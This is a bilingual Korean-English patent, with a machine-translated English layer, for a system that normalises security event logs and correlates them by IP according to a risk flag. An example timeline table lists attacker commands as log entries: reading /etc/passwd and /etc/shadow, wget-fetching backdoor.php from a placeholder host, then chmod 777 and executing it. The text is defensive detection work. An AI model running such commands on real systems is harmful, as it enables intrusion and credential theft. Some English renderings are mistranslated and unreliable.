"logtype"은 본 발명에서 탐지대상이 되는 보안 이벤트의 유형으로서, 네트워크 패킷 이벤트로그(syslogs), 방화벽 정책 이벤트로그(iptableslogs), 침입탐지/차단시스템 이벤트로그(detectionlogs), 백신 악성코드 이벤트로그(infectedlogs), 라우터/스위치 네트워크 이벤트로그(networklogs), 리눅스 SSH(Secure Shell) 이벤트로그(securelogs), 웹 방화벽 이벤트로그(waflogs), 리눅스 시스템 명령 실행 이벤트로그(cmdlogs), 악성코드 배포지 이벤트로그(malwarelogs), VPN(Virtual Private Network) 이벤트로그(vpnlogs), 윈도우 원격 터미널 이벤트로그(eventlogs), 파일 시스템 모니터 이벤트로그(filemonlogs), 윈도우 레지스트리(Registry) 이벤트로그(regmonlogs), 웹을 통한 실행파일 다운로드 이벤트로그(httpdlogs), 정보시스템 도메인 쿼리 이벤트로그(dnslogs), 웹 접근 이벤트로그(accesslogs), 데이터베이스 이벤트로그(dblogs), 시스템 보안 패치 이벤트로그(patchlogs), 시스템 계정 이벤트로그(userlogs), 시스템 네트워크 이벤트로그(netstatelogs), 루트킷 이벤트로그(rootkitlogs) 등으로 구성된다."logtype" is a type of security event to be detected in the present invention, and includes a network packet event log (syslogs), a firewall policy event log (iptableslogs), an intrusion detection / blocking system event log (detectionlogs) infectedlogs), router / switch network event logs (networklogs), Linux SSH (secure shell) event logs (securelogs), web firewall event logs (waflogs), Linux system command execution event logs (cmdlogs) malwarelogs), virtual private network (VPN) event logs (vpnlogs), Windows remote terminal event logs, file system monitor event logs (filemonlogs), Windows registry (regmonlogs) Event logs (httpdlogs), information system domain query event logs (dnslogs), web access event logs (accesslogs), database events (Dblogs), system security patch event logs (patchlogs), system account event logs (userlogs), system network event logs (netstatelogs), and rootkit event logs (rootkitlogs).

각 보안이벤트는 로그 파일, DB , 네트워크 Pcap(Packet Capture)파일 형태 등등 로컬단말기 구성환경에 종속적인 형태로 기록되게 된다.Each security event is recorded in a form dependent on the local terminal configuration environment such as a log file, a DB, a network Pcap (packet capture) file format, and the like.

"history"는 탐지룰에 대한 정의 및 특징을 기록하는데, 분석시스템(100) 또는 보안 관리자에 의한 탐지룰의 등록이나 수정, 삭제 등의 이력를 관리하기 위한 컬럼으로 사용된다.The "history" records definitions and characteristics of detection rules, and is used as a column for managing the history of registration, modification, deletion, etc. of detection rules by the analysis system 100 or the security administrator.

"registertime"은 탐지룰의 생성 시간을 기록하는데, 탐지룰이 등록/생성된 일시(DateTime)를 정의한다."registertime" records the generation time of the detection rule, and defines the date and time when the detection rule is registered / created.

"supervisionid"는 탐지룰을 등록한 보안 관리자 또는 시스템의 고유값으로서, 보안 관리자의 ID를 의미한다."supervisionid" is a unique value of the security manager or system that registered the detection rule, and it means the ID of the security manager.

"cnt"는 탐지룰의 인덱스(index) 번호를 기록하는데, 보안 관리자 또는 시스템이 탐지룰을 등록/생성할 때마다 순차적으로 증가하는 인덱스 번호를 생성한다."cnt " records the index number of the detection rule, and generates an index number that sequentially increases each time the security manager or the system registers / creates the detection rule.

"flag"는 위험도 플래그를 기록한다. 위험도 플래그는 탐지룰에 대한 위험도(CVE, 정보보호지침, 정보보호조직 경험 기반으로 위험도 판정)를 위험도 플래그 측정 연산식에 대입하여 결정된다."flag" records the risk flag. The risk flag is determined by substituting the risk for the detection rule (CVE, information protection guideline, risk assessment based on information protection organization experience) into the risk flag measurement calculation formula.

위험도 플래그가 0인 경우에는 단일이벤트탐지부(106)가 하나의 이벤트로그를 대상으로 하는 단일 이벤트 분석을 한다. 그러나 위험도 플래그가 1이나 2, 3일 경우에는 연계분석부(108)가 복수의 이벤트로그를 서로 연계하여 분석을 실시한다. 위험도 플래그가 1일 경우에는 SRC(출발지의 IP)를 기반으로 연계분석을 하고, 위험도 플래그가 2일 경우에는 DST(목적지의 IP)를 기반으로 연계분석을 한다. 그리고 3일 경우에는 SRC와 DST를 기반으로 연계분석을 하는데, 이에 대해서는 후술한다.When the risk flag is 0, the single event detection unit 106 performs a single event analysis on one event log. However, when the risk flag is 1, 2, or 3, the linkage analysis unit 108 performs analysis by linking a plurality of event logs. When the risk flag is 1, linkage analysis is performed based on the SRC (origin IP). When the risk flag is 2, linkage analysis is performed based on DST (destination IP). In case of 3 days, linkage analysis is performed based on SRC and DST, which will be described later.

통합로그DB(114)에는 로컬단말기(200)로부터 수집된 이벤트로그와, 로그정규화부(104)에 의해 JSON 파일 형태로 변환된 정규화 이벤트로그가 저장된다.In the integrated log DB 114, an event log collected from the local terminal 200 and a normalization event log converted into a JSON file by the log normalization unit 104 are stored.

이상과 같은 구성을 이용하여 보안침해를 분석하는 방법에 대해서 자세하게 설명한다.We will explain in detail how to analyze security breach using the above configuration.

도 3은 본 발명의 분석시스템을 이용한 보안침해 분석방법의 과정을 나타낸 순서도이다.FIG. 3 is a flowchart illustrating a process of a security invasion analysis method using the analysis system of the present invention.

먼저 로컬단말기(200)는 다양한 형태의 보안 이벤트를 수집하여 이벤트로그에 기록하고, 통합로그수집부(102)는 로컬단말기(200)로부터 이벤트로그를 받아서 통합로그DB(114)에 저장한다.(S102)First, the local terminal 200 collects various types of security events and records them in an event log. The integrated log collection unit 102 receives event logs from the local terminal 200 and stores them in the integrated log DB 114. S102)

로컬단말기(200)에서 수집하는 보안 이벤트 목록은 "logtype"에 기재되는 이벤트 목록과 동일하다.The security event list collected by the local terminal 200 is the same as the event list described in "logtype ".

로그정규화부(104)는 통합로그수집부(102)에 의해 통합로그DB(114)에 저장된 보안 이벤트로그를 정규화하여 통합로그DB(114)에 저장한다.(S104)The log normalization unit 104 normalizes the security event log stored in the integrated log DB 114 by the integrated log collecting unit 102 and stores it in the integrated log DB 114. In step S104,

이벤트로그의 정규화는 서로 다른 형태로 기록된 이벤트로그에서 공통되는 속성을 지닌 데이터 필드를 묶어서 보여줌으로써 관리자가 빠르게 보안 이벤트의 내용을 파악할 수 있도록 하기 위한 것이다.The normalization of the event log is intended to allow the administrator to quickly grasp the contents of the security event by displaying data fields having common attributes in the event log recorded in different forms.

이벤트로그의 정규화는 보안시스템의 종류와 특성에 따라서 달라질 수 있는데, 본 발명에서는 이벤트로그에 포함된 데이터를 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"으로 정렬한다.In the present invention, the data included in the event log is sorted into "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, and LINKED_LOGTYPE" in the event log normalization. do.

각각의 필드가 나타내는 정보는 다음의 표 2와 같다.The information represented by each field is shown in Table 2 below.

필드field 정의Justice TIMETIME 보안 이벤트의 탐지 시각Security event detection time TYPETYPE 보안 이벤트의 유형Types of security events HOSTHOST 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임The IP address or host name of the sensor from which the security event was detected. SRCSRC 보안 이벤트의 출발지의 IPIP of origin of security event DSTDST 보안 이벤트의 목적지의 IPIP of the destination of the security event CONTENTS_001 ~ CONTENTS_004CONTENTS_001 ~ CONTENTS_004 보안 이벤트에서 발생하는 상세 내용Details on security events LINKED_LOGTYPELINKED_LOGTYPE 보안 이벤트 연계분석 대상Security event linkage analysis target

TIME 필드에는 보안 이벤트의 탐지시각을 unixtimestamp 형식으로 기록한다.The TIME field records the time of the detection of the security event in unixtimestamp format.

HOST 필드에는 IPv4 기반의 탐지 센서의 IP 주소 또는 호스트 네임을 기록한다. 호스트 네임은 DNS Resolving이 가능한 것을 선택한다.The HOST field records the IP address or host name of the IPv4-based detection sensor. The hostname chooses DNS resolvability.

SRC와 DST 필드에 기록되는 IP 역시 IPv4 기반의 주소를 기록한다.IP recorded in the SRC and DST fields also records IPv4-based addresses.

CONTENTS 필드에는 이벤트로그 생성시에 기록되는 세부 내용이 기재되며, 이벤트로그별 키워드의 구체적인 내용이 포함될 수도 있다.In the CONTENTS field, details recorded at the time of event log creation are described, and specific contents of the event log-related keywords may be included.

LINKED_LOGTYPE 필드에는 해당 이벤트로그가 연계분석을 수행할 다양한 이벤트로그의 대상이 정의된다. 연계분석을 수행할 대상은 특정한 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그가 된다.The LINKED_LOGTYPE field defines the target of the various event logs for which the event log will perform linkage analysis. The target of the linkage analysis is the event log in which the security event occurs over a predetermined threshold value for a certain time before or after the occurrence time of a specific single event.

예를 들어, 2015년 11월 2일 오후 1시에 특정한 단일 보안 이벤트가 발생하여 이를 단일 분석 대상으로 했다면, 오후 1시를 전후하여 1시간 동안 10회 이상의 이상 보안 이벤트가 발생한 다른 이벤트로그를 연계분석 대상으로 할 수 있다. 즉, 오후 12시부터 오후 2시까지의 두 시간동안 10회 이상 보안 이벤트가 발생했던 유형의 이벤트로그를 선택한다.For example, if a single single security event occurs at 1 PM on November 2, 2015 and you want to have a single analysis on it, you can associate another event log with more than 10 security events in the hour around 1 PM It can be analyzed. That is, select the event log of the type in which the security event occurred more than 10 times during the two hours from 12:00 pm to 2:00 pm.

기준이 되는 시각과 전후 시간의 길이, 이상 보안 이벤트의 임계치 등의 기준은 보안 관리자 또는 시스템이 적절하게 선택할 수 있다.The criterion such as the time of the reference time, the length of the time before and after the event, the threshold value of the abnormal event, and the like can be appropriately selected by the security administrator or the system.

단일이벤트탐지부(106)는 정규화되어 JSON 파일 형태로 저장된 이벤트로그를 추출하고, 로그 파일에서 단일이벤트를 탐지하여 위험성을 분석한다.(S106) 단일이벤트탐지부(106)는 보안 이벤트의 탐지룰을 기준으로 분석하는데, 먼저 탐지룰에서 단일 보안 이벤트 탐지 대상으로 규정되어 있는지를 확인한다. 본 발명에서는 탐지룰에 저장된 주요한 탐지 키워드가 개별 보안 이벤트에서 발생하는 경우에 탐지대상이 되는 것으로 설정한다.The single event detection unit 106 extracts the event log stored in the form of a JSON file, and detects a single event in the log file to analyze the risk (S106). The single event detection unit 106 detects a security event . First, it is confirmed whether the detection rule is defined as a single security event detection target. In the present invention, when a primary detection keyword stored in a detection rule occurs in an individual security event, it is set to be a detection target.

단일이벤트탐지부(106)는 보안 이벤트 세부 내용 중에서 CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004를 대상으로 하는 컨텐츠 기반 탐지와, [HOST, SRC, DST]를 대상으로 하는 호스트 기반 탐지를 복합적으로 사용한다.The single event detection unit 106 uses a combination of content based detection targeting CONTENTS_001, CONTENTS_002, CONTENTS_003, and CONTENTS_004 and host based detection targeting [HOST, SRC, DST] among security event details.

컨텐츠 기반 탐지의 경우 이벤트로그의 세부내용이 기록되는 CONTENTS_001 내지 CONTENTS_004에 대하여 이벤트탐지룰DB(112)에서 참조하는 키워드를 패턴 매칭하게 되는데, AND, OR, NOT 연산자 조합을 통하여 탐지한다.In the case of content-based detection, the patterns referenced in the event detection rule DB 112 are pattern-matched with CONTENTS_001 to CONTENTS_004 in which the detailed contents of the event log are recorded, and are detected through a combination of AND, OR, and NOT operators.

호스트 기반 탐지의 경우 이벤트로그의 IP가 기록되게 되는 HOST, SRC, DST에 대하여 이벤트탐지룰DB(112)에서 참조하는 키워드를 패턴 매칭하게 되는데, AND, OR, NOT 연산자 조합을 통하여 탐지한다.In the case of host-based detection, a keyword referred to in the event detection rule DB 112 is pattern-matched with respect to HOST, SRC, and DST in which the IP of the event log is recorded. The detection is performed through a combination of AND, OR, and NOT operators.

단일이벤트탐지부(106)는 단일 분석 결과를 가공하여, 정보보호를 담당하는 관리자에게 알람 시그널을 전송한다.The single event detection unit 106 processes a single analysis result and transmits an alarm signal to an administrator responsible for information protection.

다음으로 위험도측정부(110)는 단일이벤트탐지부(106)에 의하여 탐지되어진 보안 이벤트로그를 대상으로 이벤트탐지룰DB(112)의 위험도 플래그를 참조하여 연계로그유형(LINKED_LOGTYPE)을 결정하여 저장한다.(S108)Next, the risk measurement unit 110 determines a linkage log type (LINKED_LOGTYPE) by referring to the risk flag of the event detection rule DB 112 with respect to the security event log detected by the single event detection unit 106 (S108)

위험도 플래그는 정보보호 활동을 수행하는 정보보호관리자가 이벤트탐지룰DB(112)에 단일이벤트 탐지룰 등록/생성시 결정되는데, 조직내 정보보호지침, 정보보호 활동의 경험, CVE(Common Vulnerabilities & Exposures; 공통 보안 취약성 및 노출)를 고려하여 정한 위험도 플래그 측정 연산식에 대입하여 결정한다.The risk flag is determined when an information protection manager performing an information protection activity registers / creates a single event detection rule in the event detection rule DB 112. The risk flag is classified into an organizational information protection guideline, an information protection activity experience, CVE (Common Vulnerabilities &Exposures; Common security vulnerability and exposure).

CVE의 경우에는 CVSS(Common Vulnerability Scoring system)에 의해 분류된 High/Medium/Low를 참조한다. 예를 들어 CVSS에 의해 분류된 등급이 High일 경우에는 7점 내지 10점을 부여하고, Medium일 경우에는 4점 내지 6.9점, Low일 경우에는 0점 내지 3.9점을 부여한다. 경우에 따라서는 Medium 이상일 경우와 이하일 경우로 2분화할 수도 있다.In case of CVE, refer to High / Medium / Low classified by CVSS (Common Vulnerability Scoring system). For example, when the class classified by CVSS is High, 7 points to 10 points are given. In the case of Medium, 4 points to 6.9 points are given. In the case of Low, 0 points to 3.9 points are given. In some cases, it may be divided into two cases, that is, the case of "medium" or more and the case of "less than".

정보보호지침의 경우에는 침해 시도 등급 기준으로 1등급을 '상'으로, 2등급을 '중'으로, 3등급을 '하'로 분류하여 소정의 점수를 부여한다. 경우에 따라서는 2등급 이상일 경우에 위험도 플래그를 상승시키도록 할 수도 있다.In the case of the information protection guideline, the first grade is awarded as 'up', the second grade as 'middle', and the third grade as 'lower'. In some cases, the risk flag may be raised in the case of class 2 or higher.

정보보호의 관리자가 정보보호조직의 보안 이슈/분석에서의 경험을 참조하여 플래그값을 결정하도록 할 수도 있을 것이다.The administrator of the information protection may determine the flag value by referring to the experience in the security issue / analysis of the information security organization.

CVE와 정보보호지침, 관리자의 경험 등을 참조하여 위험도 플래그를 결정할 수 있는데, 이외에도 다양한 기준에 따라서 위험도 플래그를 선택할 수 있다. 본 발명의 분석시스템(100)에서는 이러한 기준에 따라 등록되어진 이벤트탐지룰DB(112)를 기준으로 하여 위험도측정부(110)가 이벤트로그에 대한 연계로그유형을 결정한다. 그리고, 연계분석부(108)는 정해진 연계로그유형에 따라 연계분석을 결정하고, 보안이벤트의 정규화 컬럼 "LINKED_LOGTYPE"을 참조하여 연계분석 대상이 되는 이벤트로그를 추출한다.(S110)The risk flag can be determined by referring to the CVE, the information protection guidelines, and the manager's experience. In addition, the risk flag can be selected according to various criteria. In the analysis system 100 of the present invention, the risk measurement unit 110 determines a connection log type for the event log based on the event detection rule DB 112 registered according to the criteria. Then, the linkage analysis unit 108 determines linkage analysis according to the determined linkage log type, extracts an event log to be linkage analysis by referring to the normalization column "LINKED_LOGTYPE" of the security event (S110)

연계분석부(108)는 연계로그유형에 따라 이벤트로그에 대한 연계분석을 실시하고, 그 결과에 따른 알람을 관리자단말기(300)에 전달한다.(S112)The linkage analyzing unit 108 performs linkage analysis on the event log according to the linkage log type, and transmits an alarm according to the linkage to the administrator terminal 300 (S112)

탐지대상이 되는 이벤트로그에 대한 위험도 플래그가 0일 때는 연계분석을 실시하지 않는다.When the risk flag for the event log to be detected is 0, no linkage analysis is performed.

위험도 플래그가 1일 때는 해당 보안 이벤트로그에서 SRC(보안 이벤트에서 출발지의 IP)의 값을 추출하여 정규화 데이터에 포함된 컬럼 "LINKED_LOGTYPE"에 정의되어진 보안이벤트의 SRC와 DST에 대한 OR 연산 연계분석을 실시한다.When the risk flag is 1, it extracts the value of SRC (originating IP from security event) in the corresponding security event log and analyzes the OR operation of SRC and DST defined in the column "LINKED_LOGTYPE" included in the normalization data Conduct.

위험도 플래그가 2일 때는 해당 보안 이벤트로그에서 DST(보안 이벤트에서 목적지의 IP)의 값을 추출하여 정규화 데이터에 포함된 컬럼 "LINKED_LOGTYPE"에 정의되어진 보안이벤트의 SRC와 DST에 대한 OR 연산 연계분석을 실시한다.When the risk flag is 2, the value of DST (the IP of the destination in the security event) is extracted from the corresponding security event log, and the OR operation of SRC and DST defined in the column "LINKED_LOGTYPE" included in the normalization data is analyzed Conduct.

위험도 플래그값이 3일 때는 해당 보안 이벤트로그에서 SRC 및 DST값을 함께 추출하여 정규화 데이터에 포함된 컬럼 "LINKED_LOGTYPE"에 정의되어진 보안이벤트를 대상으로 SRC와 DST에 대한 AND 연산 연계분석을 실시한다.When the risk flag value is 3, SRC and DST values are extracted together in the corresponding security event log, and an AND operation link analysis is performed on SRC and DST for the security events defined in the column "LINKED_LOGTYPE" included in the normalization data.

연계분석부(108)는 연계분석 결과를 JSON 파일 형태로 변환하여 통합로그DB(114)에 저장한다.The linkage analyzing unit 108 converts the linkage analysis result into a JSON file and stores the linkage analysis result in the integrated log DB 114.

도 5a와 5b는 이벤트로그에 대한 연계분석을 한 결과를 나타낸 테이블이다.5A and 5B are tables showing a result of linkage analysis for event logs.

도 5a와 5b를 참조하면, 침입탐지/차단시스템 보안이벤트(detectionlogs)의 SRC(출발지 IP 주소) 125.141.XX.XX(가칭)에서 DST(목적지 IP 주소) 218.15.XX.XX(가칭) 로 이벤트로그가 탐지되었다. 그리고 이벤트탐지룰DB(112)에 저장된 위험도 플래그는 2로 결정되었기 때문에 정규화된 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그의 SRC와 DST를 OR 연산하여 연계분석을 수행하였다.Referring to FIGS. 5A and 5B, events (events) are transmitted from the SRC (originating IP address) 125.141.XX.XX (tentative name) to the DST (destination IP address) 218.15.XX.XX (tentative) of the intrusion detection / The log was detected. Since the risk flag stored in the event detection rule DB 112 is determined to be 2, the DST is extracted from the normalized event log, and the link analysis is performed by ORing the SRC and DST of the event log defined in the "LINKED_LOGTYPE ".

아래의 표 3은 시간 순서대로 도 5a와 5b의 보안 이벤트를 분석한 결과를 설명한 내용이다.Table 3 below describes the results of analysis of the security events in FIGS. 5A and 5B in time sequence.

INDEXINDEX TIMELINETIMELINE 보안이벤트 로그Security event log 탐지 내용 설명Explanation of detection 1One 2015년10월01일
오전11시10분24초October 01, 2015
11:10:24 AM detectionlogsdetectionLogs 125.141.XX.XX에서 218.15.XX.XX 시스템을 대상으로 SQL Injection 공격탐지
위험도 플래그 결정: 위험도 플래그 값이 2로 연계분석 대상으로 결정
정규화 컬럼 LINKED_LOGTYPE에 선언되어진 이벤트로그를 대상으로 연계분석을 실시Detecting SQL Injection Attacks on 125.141.XX.XX to 218.15.XX.XX Systems
Determine risk flag: Determine risk flag value as 2
Perform linkage analysis on the event log declared in the normalized column LINKED_LOGTYPE. 22 2015년10월01일
오전11시10분26초October 01, 2015
11:10:26 AM waflogswaflogs 125.141.XX.XX에서 218.15.XX.XX 시스템을 대상으로 SQL Injection 공격탐지Detecting SQL Injection Attacks on 125.141.XX.XX to 218.15.XX.XX Systems 33 2015년10월01일
오전11시11분26초October 01, 2015
11:11:26 AM securelogssecurelogs 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지218.15.XX.XX System SSH access attempt failure detection from 125.141.XX.XX 44 2015년10월01일
오전11시11분27초October 01, 2015
11:11:27 AM securelogssecurelogs 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지218.15.XX.XX System SSH access attempt failure detection from 125.141.XX.XX 55 2015년10월01일
오전11시11분29초October 01, 2015
11:11:29 AM securelogssecurelogs 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지218.15.XX.XX System SSH access attempt failure detection from 125.141.XX.XX 66 2015년10월01일
오전11시11분29초October 01, 2015
11:11:29 AM securelogssecurelogs 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지218.15.XX.XX System SSH access attempt failure detection from 125.141.XX.XX 77 2015년10월01일
오전11시11분31초October 01, 2015
11:11:31 AM securelogssecurelogs 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지218.15.XX.XX System SSH access attempt failure detection from 125.141.XX.XX 88 2015년10월01일
오전11시11분33초October 01, 2015
11:11:33 AM securelogssecurelogs 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 성공 탐지218.15.XX.XX System SSH Access Success Detection at 125.141.XX.XX 99 2015년10월01일
오전11시20분32초October 01, 2015
11:20:32 AM cmdlogscmdlogs 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/passwd 명령 수행을 통해 파일 열람 이력 탐지Users who access the system from the 125.141.XX.XX to the 218.15.XX.XX system can use the vim / etc / passwd command to detect file browsing history 1010 2015년10월01일
오전11시20분40초October 01, 2015
11:20:40 AM cmdlogscmdlogs 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가
vim /etc/shadows 명령 수행을 통해 파일 열람 이력 탐지Users connecting from the 125.141.XX.XX to the 218.15.XX.XX system
Detecting file history by running vim / etc / shadows command 1111 2015년10월01일
오전11시20분55초October 01, 2015
11:20:55 AM cmdlogscmdlogs 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가
vim /etc/hosts 명령 수행을 통해 파일 열람 이력 탐지Users connecting from the 125.141.XX.XX to the 218.15.XX.XX system
Detecting file browsing history by running vim / etc / hosts command 1212 2015년10월01일
오전11시21분05초October 01, 2015
11:21:05 AM cmdlogscmdlogs 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가
wget http:xxx.xx.xx/backdoor.php 다운로드 명령 수행 탐지Users connecting from the 125.141.XX.XX to the 218.15.XX.XX system
Detect wget http: xxx.xx.xx / backdoor.php download command execution 1313 2015년10월01일
오전11시21분06초October 01, 2015
11:21:06 AM httpdlogshttpdlogs 218.15.XX.XX 시스템에서
http:xxx.xx.xx/backdoor.php 파일이 다운로드 패킷 보안 이벤트 탐지On a 218.15.XX.XX system
http: xxx.xx.xx / backdoor.php file download packet security event detection 1414 2015년10월01일
오전11시21분56초October 01, 2015
11:21:56 AM cmdlogscmdlogs 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가
mv backdoor.php /tmp/system.php 명령 수행 탐지Users connecting from the 125.141.XX.XX to the 218.15.XX.XX system
mv backdoor.php /tmp/system.php Command execution detection 1515 2015년10월01일
오전11시22분01초October 01, 2015
11:22:01 AM cmdlogscmdlogs 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가
chmod 777 /tmp/system.php; php /tmp/system.php 명령 수행 탐지Users connecting from the 125.141.XX.XX to the 218.15.XX.XX system
chmod 777 /tmp/system.php; php /tmp/system.php command execution detection 1616 2015년10월01일
오전11시22분05초October 01, 2015
11:22:05 AM dnslogsdnslogs 218.15.XX.XX 시스템에서
악성사이트로 추정되는 도메인 질의 탐지On a 218.15.XX.XX system
Detecting domain queries that are suspected to be malicious sites 1717 2015년10월01일
오전11시22분06초October 01, 2015
11:22:06 AM dnslogsdnslogs 218.15.XX.XX 시스템에서
악성사이트로 추정되는 도메인 질의 탐지On a 218.15.XX.XX system
Detecting domain queries that are suspected to be malicious sites 1818 2015년10월01일
오전11시22분07초October 01, 2015
11:22:07 AM dnslogsdnslogs 218.15.XX.XX 시스템에서
악성사이트로 추정되는 도메인 질의 탐지On a 218.15.XX.XX system
Detecting domain queries that are suspected to be malicious sites 1919 2015년10월01일|
오전11시22분47초October 01, 2015 |
11:22:47 AM infectedlogsinfectedlogs 218.15.XX.XX 시스템에서
백신 악성코드 탐지On a 218.15.XX.XX system
Vaccine malware detection 2020 2015년10월01일
오전11시24분01초October 01, 2015
11:24:01 AM patchlogspatchlogs 218.15.XX.XX 시스템에서
SSL 취약점 탐지 On a 218.15.XX.XX system
SSL vulnerability detection 2121 2015년10월01일
오전11시24분12초October 01, 2015
11:24:12 AM patchlogspatchlogs 218.15.XX.XX 시스템에서
BASH SHELL 취약점 탐지 On a 218.15.XX.XX system
BASH SHELL vulnerability detection

표 3에 기록된 21단계의 보안 이벤트를 요약하면, 침입탐지/차단시스템 이벤트로그(detectionlogs)에 SQL Injection 공격시도가 탐지되었으며, 해당 단일이벤트의 위험도 플래그(2)에 따라 연계분석을 실시한 결과, 웹 방화벽 이벤트로그(waflog), 리눅스 SSH 이벤트로그(securelogs), 리눅스 시스템 명령 수행 이벤트로그(cmdlogs), 웹을 통한 실행파일 다운르도 이벤트로그(httpdlogs), 시스템 도메인 쿼리 이벤트로그(dnslogs), 악성코드 감염 이벤트로그(infectedlogs), 시스템 패치 이벤트로그(pathclogs)가 다수 연계분석 되었음을 알 수 있다. To summarize the security events in step 21 recorded in Table 3, an attempt was made to detect an SQL injection attack in the intrusion detection / prevention system event logs (detection logs). As a result of linkage analysis according to the risk flag (2) It is possible to use the web firewall event log (waflog), Linux SSH event log (securelogs), Linux system command execution event log (cmdlogs), executable file download event log (httpdlogs), system domain query event log (dnslogs) Code infected event logs (infectedlogs), and system patch event logs (pathclogs).

따라서, 특정 IP에서 발생한 보안 침해의 흐름 및 위치와 특정 시스템의 보안 위협(Threat), 취약성(Vulnerability)을 연계분석을 통하여 빠르게 확인할 수 있다.Therefore, it is possible to quickly check the flow and location of security violation occurred in a specific IP and security threat (vulnerability) of a specific system through linkage analysis.

만약 특정 보안 이벤트로그의 위험도 플래그가 1인 경우에는 SRC를 기준으로 연계분석을 실시하여 관리자에게 제공할 수 있다. 또한 위험도 플래그가 3인 경우에는 SRC와 DST를 동시에 기준으로 삼아 연계분석을 실시한다.If the risk flag of a specific security event log is 1, linkage analysis based on SRC can be performed and provided to the administrator. When the risk flag is 3, the linkage analysis is performed using both SRC and DST as a reference.

그러나 위험도 플래그에 따른 연계분석 필드의 선택 기준은 시스템의 특성에 따라 달라질 수 있다. 즉, 위험도 플래그가 2일 경우에 SRC를 기준으로 연계분석을 실시하고, 위험도 플래그가 1일 경우에 DST를 기준으로 연계분석을 실시하도록 설정할 수도 있을 것이다. 이외에도 새로운 위험도 플래그에 따라 연계분석 조건식을 설정할 수도 있을 것이다.However, the selection criterion of the linkage analysis field according to the risk flag may vary depending on the characteristics of the system. That is, if the risk flag is 2, linkage analysis may be performed based on the SRC, and when the risk flag is 1, linkage analysis may be performed based on DST. In addition, a linkage analysis conditional expression may be set according to a new risk flag.

연계분석의 결과는 통합로그DB(114)에 저장된다.(S114)The result of the linkage analysis is stored in the integrated log DB 114. (S114)

따라서 단일 보안 이벤트로는 제한적인 침해 탐지, 침해 인과관계, 위협, 취약성 등에 대한 연계분석 결과를 통하여 쉽게 보안 침해 탐지가 가능하며, 타임라인으로 이벤트 발생 순서를 정렬함으로써 관리자가 침해의 시도 과정을 쉽게 확인을 할 수 있다.Therefore, a single security event can easily detect security intrusion by link analysis result of limited intrusion detection, infringement causation, threat, vulnerability, etc., and by arranging the event occurrence sequence in the timeline, You can check.

또한 보안 침해의 분석에 소모되는 인적, 물적, 시간적 자원을 절감할 수 있다.It can also reduce the human, material, and temporal resources required to analyze security breaches.

이상 첨부된 도면을 참조하여 본 발명의 바람직한 실시예를 설명하였지만, 상술한 본 발명의 기술적 구성은 본 발명이 속하는 기술 분야의 당업자가 본 발명의 그 기술적 사상이나 필수적 특징을 변경하지 않고서 다른 구체적인 형태로 실시될 수 있다는 것을 이해할 수 있을 것이다. 그러므로 이상에서 기술한 실시예들은 모든 면에서 예시적인 것이며 한정적인 것이 아닌 것으로서 이해되어야 하고, 본 발명의 범위는 상기 상세한 설명보다는 후술하는 특허청구범위에 의하여 나타내어지며, 특허청구범위의 의미 및 범위 그리고 그 등가 개념으로부터 도출되는 모든 변경 또는 변형된 형태가 본 발명의 범위에 포함되는 것으로 해석되어야 한다.While the present invention has been described with reference to exemplary embodiments, it is to be understood that the invention is not limited to the disclosed embodiments, but, on the contrary, As will be understood by those skilled in the art. Therefore, it should be understood that the above-described embodiments are to be considered in all respects as illustrative and not restrictive, the scope of the invention being indicated by the appended claims rather than the foregoing description, It is intended that all changes and modifications derived from the equivalent concept be included within the scope of the present invention.

100 : 분석시스템 102 : 통합로그수집부
104 : 로그정규화부 106 : 단일이벤트탐지부
108 : 연계분석부 110 : 위험도측정부
112 : 이벤트탐지룰DB 114 : 통합로그DB
200 : 로컬단말기 202 : 로컬로그수집부
300 : 관리자단말기100: analysis system 102: integrated log collection unit
104: log normalization unit 106: single event detection unit
108: linkage analysis unit 110: risk measurement unit
112: event detection rule DB 114: integrated log DB
200: local terminal 202: local log collection unit
300: administrator terminal

Claims (8)

로컬단말기(200)에서 발생하는 보안 이벤트를 분석하여 관리자에게 제공하는 보안침해 분석시스템으로서,
상기 로컬단말기(200)에 설치된 로컬로그수집부(202)가 수집하여 전송한 이벤트로그를 수신하여 통합로그DB(114)에 저장하는 통합로그수집부(102)와;
상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 로그정규화부(104)와;
이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 단일이벤트탐지부(106)와;
상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 부여된 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 연계분석부(108)와;
상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 위험도측정부(110);를 포함하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템.A security infringement analysis system for analyzing a security event occurring in a local terminal (200)
